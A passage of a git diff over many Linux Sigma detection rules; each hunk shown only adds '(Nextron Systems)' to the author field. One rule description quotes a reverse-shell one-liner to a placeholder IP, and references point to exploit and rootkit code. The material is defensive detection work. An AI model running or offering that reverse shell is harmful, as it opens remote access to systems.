 - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/01
 tags:
 - attack.t1068
diff --git a/rules/linux/builtin/lnx_clear_syslog.yml b/rules/linux/builtin/lnx_clear_syslog.yml
index d368561ea..af04269f5 100644
--- a/rules/linux/builtin/lnx_clear_syslog.yml
+++ b/rules/linux/builtin/lnx_clear_syslog.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects specific commands commonly used to remove or empty the syslog
 references:
 - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/09/10
 modified: 2022/11/26
 tags:
diff --git a/rules/linux/builtin/lnx_ldso_preload_injection.yml b/rules/linux/builtin/lnx_ldso_preload_injection.yml
index 91bd27cfd..fe3b96902 100644
--- a/rules/linux/builtin/lnx_ldso_preload_injection.yml
+++ b/rules/linux/builtin/lnx_ldso_preload_injection.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the ld.so preload persistence file. See `man ld.so` for more information.
 references:
 - https://man7.org/linux/man-pages/man8/ld.so.8.html
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/05/05
 modified: 2022/10/09
 tags:
diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml
index 646af4980..34ae447f6 100644
--- a/rules/linux/builtin/lnx_shell_susp_commands.yml
+++ b/rules/linux/builtin/lnx_shell_susp_commands.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
 - http://pastebin.com/FtygZ1cg
 - https://artkond.com/2017/03/23/pivoting-guide/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/21
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/lnx_shell_susp_log_entries.yml b/rules/linux/builtin/lnx_shell_susp_log_entries.yml
index a17b2c81e..39052a786 100644
--- a/rules/linux/builtin/lnx_shell_susp_log_entries.yml
+++ b/rules/linux/builtin/lnx_shell_susp_log_entries.yml
@@ -2,7 +2,7 @@ title: Suspicious Log Entries
 id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
 status: test
 description: Detects suspicious log entries in Linux log files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/25
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/lnx_shell_susp_rev_shells.yml b/rules/linux/builtin/lnx_shell_susp_rev_shells.yml
index 82aa7f352..58d50b2a2 100644
--- a/rules/linux/builtin/lnx_shell_susp_rev_shells.yml
+++ b/rules/linux/builtin/lnx_shell_susp_rev_shells.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
 references:
 - https://alamot.github.io/reverse_shells/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/04/02
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/lnx_shellshock.yml b/rules/linux/builtin/lnx_shellshock.yml
index d3851a0bd..8e9b5d2f4 100644
--- a/rules/linux/builtin/lnx_shellshock.yml
+++ b/rules/linux/builtin/lnx_shellshock.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects shellshock expressions in log files
 references:
 - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/14
 modified: 2022/10/09
 tags:
diff --git a/rules/linux/builtin/lnx_susp_jexboss.yml b/rules/linux/builtin/lnx_susp_jexboss.yml
index a46c3d7cf..eceedcdb6 100644
--- a/rules/linux/builtin/lnx_susp_jexboss.yml
+++ b/rules/linux/builtin/lnx_susp_jexboss.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command sequence that JexBoss
 references:
 - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/24
 modified: 2022/07/07
 tags:
diff --git a/rules/linux/builtin/lnx_symlink_etc_passwd.yml b/rules/linux/builtin/lnx_symlink_etc_passwd.yml
index 81c81d0cc..75393a3b9 100644
--- a/rules/linux/builtin/lnx_symlink_etc_passwd.yml
+++ b/rules/linux/builtin/lnx_symlink_etc_passwd.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
 references:
 - https://www.qualys.com/2021/05/04/21nails/21nails.txt
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/04/05
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml b/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml
index 2baec98f7..f9c561aaa 100644
--- a/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml
+++ b/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects exploitation attempt using public exploit code for CVE-2018-15473
 references:
 - https://github.com/Rhynorater/CVE-2018-15473-Exploit
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/24
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml b/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
index cf0ef48cc..8584d39b6 100644
--- a/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
+++ b/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
@@ -5,7 +5,7 @@ description: Detects suspicious SSH / SSHD error messages that indicate a fatal
 references:
 - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c
 - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/06/30
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
index 7bd58fcab..b0c3e6172 100644
--- a/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
+++ b/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
@@ -9,7 +9,7 @@ references:
 - https://www.openwall.com/lists/oss-security/2019/10/14/1
 - https://access.redhat.com/security/cve/cve-2019-14287
 - https://twitter.com/matthieugarin/status/1183970598210412546
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/15
 modified: 2022/11/26
 tags:
diff --git a/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml b/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
index 477130076..86afe19fd 100644
--- a/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
+++ b/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
 references:
 - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/20
 modified: 2022/10/05
 tags:
diff --git a/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml b/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
index 17f88c604..bbdfe379f 100644
--- a/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
+++ b/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
 references:
 - https://github.com/dagwieers/vsftpd/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/05
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml b/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
index e5cd4411f..6788ea844 100644
--- a/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
+++ b/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
 references:
 - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
diff --git a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
index fe0e24c9c..66311708c 100644
--- a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
+++ b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
 references:
 - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
diff --git a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
index 6174611ca..e07e35706 100644
--- a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
+++ b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
 references:
 - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 modified: 2022/12/31
 tags:
diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
index fce6d3d17..2610b6ae7 100644
--- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
+++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
 references:
 - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/16
 modified: 2022/12/25
 logsource:
diff --git a/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml b/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
index feb43927a..d10b57430 100644
--- a/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
+++ b/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects process connections to a Monero crypto mining pool
 references:
 - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 logsource:
 product: linux
diff --git a/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml b/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
index 4437abb6a..da2866444 100644
--- a/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
+++ b/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
@@ -5,7 +5,7 @@ description: Detects an executable accessing an ngrok tunneling endpoint, which
 references:
 - https://twitter.com/hakluke/status/1587733971814977537/photo/1
 - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/03
 tags:
 - attack.exfiltration
diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml b/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml
index eef908579..15a14c0af 100644
--- a/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
 references:
 - https://github.com/arget13/DDexec
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/07/26
 tags:
 - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml
index 06fd44c99..fc78b74c2 100644
--- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml
@@ -5,7 +5,7 @@ description: Detects the presence of a base64 version of the shebang in the comm
 references:
     - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
     - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml b/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml
index f6bab10e0..f3bff8bb7 100644
--- a/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml
@@ -6,7 +6,7 @@ references:
     - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
     - https://bpftrace.org/
     - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/25
 tags:
     - attack.execution
diff --git a/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml
index 88b121cbf..5e7c45d95 100644
--- a/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml
@@ -6,7 +6,7 @@ references:
     - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
     - https://github.com/carlospolop/PEASS-ng
     - https://github.com/diego-treitos/linux-smart-enumeration
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
     - attack.discovery
diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml
index 205abdda6..68763fafd 100644
--- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
 references:
     - https://github.com/sleventyeleven/linuxprivchecker/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml
index 8836eb232..e075425fd 100644
--- a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of the 'chattr' utility to remove immutable file attribute.
 references:
     - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml
index 5e217f0cb..d17ba38aa 100644
--- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks
 references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
-author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
 date: 2021/10/15
 modified: 2022/09/15
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml
index 9fd7bd001..de3ee14b2 100644
--- a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml
@@ -6,7 +6,7 @@ description: |
     This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
 references:
     - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml
index 45c05de3a..12aec6df0 100644
--- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects command line parameters or strings often used by crypto miners
 references:
     - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 modified: 2022/12/25
 logsource:
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml
index 770a0b51b..3df1ec19f 100644
--- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
 references:
     - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.command_and_control
diff --git a/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml b/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml
index d43cd9c1c..af602ce6c 100644
--- a/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
 references:
     - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/03
 tags:
     - attack.initial_access
diff --git a/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml b/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml
index d6ad54f0f..2e9dc2c64 100644
--- a/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml
@@ -6,7 +6,7 @@ references:
     - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
     - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
     - https://github.com/apache/spark/pull/36315/files
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/20
 tags:
     - attack.initial_access
diff --git a/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml b/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml
index 09341166b..e65fede77 100644
--- a/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml
@@ -5,7 +5,7 @@ description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and pr
 references:
     - https://gtfobins.github.io/gtfobins/apt/
     - https://gtfobins.github.io/gtfobins/apt-get/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
     - attack.discovery
diff --git a/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml b/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml
index 2438e80eb..35b504161 100644
--- a/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml
@@ -6,7 +6,7 @@ references:
     - https://gtfobins.github.io/gtfobins/vim/
     - https://gtfobins.github.io/gtfobins/rvim/
     - https://gtfobins.github.io/gtfobins/vimdiff/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
     - attack.discovery
diff --git a/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml b/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml
index 2231e5d33..07fd2d3e1 100644
--- a/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml
@@ -7,7 +7,7 @@ references:
     - https://github.com/Gui774ume/ebpfkit
     - https://github.com/pathtofile/bad-bpf
     - https://github.com/carlospolop/PEASS-ng
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 modified: 2023/01/31
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml b/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml
index 726225676..0975b798b 100644
--- a/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects installation of suspicious packages using system installation utilities
 references:
     - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
index b780d4369..acd094a4e 100644
--- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
 references:
     - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml b/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
index ab79e370b..2fefd6c1a 100644
--- a/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
@@ -6,7 +6,7 @@ references:
     - https://www.openwall.com/lists/oss-security/2019/10/14/1
     - https://access.redhat.com/security/cve/cve-2019-14287
     - https://twitter.com/matthieugarin/status/1183970598210412546
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/15
 modified: 2022/10/05
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
index 8bb4c2be8..70a6f5be2 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
@@ -11,7 +11,7 @@ references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
     - https://curl.se/docs/manpage.html
     - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.exfiltration
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
index 901400b74..aa046b851 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects a suspicious curl process start on linux with set useragent options
 references:
     - https://curl.se/docs/manpage.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/15
 tags:
     - attack.command_and_control
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml b/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
index e6c3f50c1..c24d14e00 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of "find" binary in a suspicious manner to perform discovery
 references:
     - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
     - attack.discovery
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml b/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
index 33e0d9972..50f15fe25 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
 references:
     - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 modified: 2023/01/05
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
index 33398ced8..965de0951 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
@@ -5,7 +5,7 @@ description: Detects events in which a history file gets deleted, e.g. the ~/bas
 references:
     - https://github.com/sleventyeleven/linuxprivchecker/
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
index ace28ef4d..d6e84f405 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
@@ -5,7 +5,7 @@ description: Detects events in which someone prints the contents of history file
 references:
     - https://github.com/sleventyeleven/linuxprivchecker/
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 modified: 2022/09/15
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
index 35465ae64..f2f0dccec 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
@@ -4,7 +4,7 @@ status: test
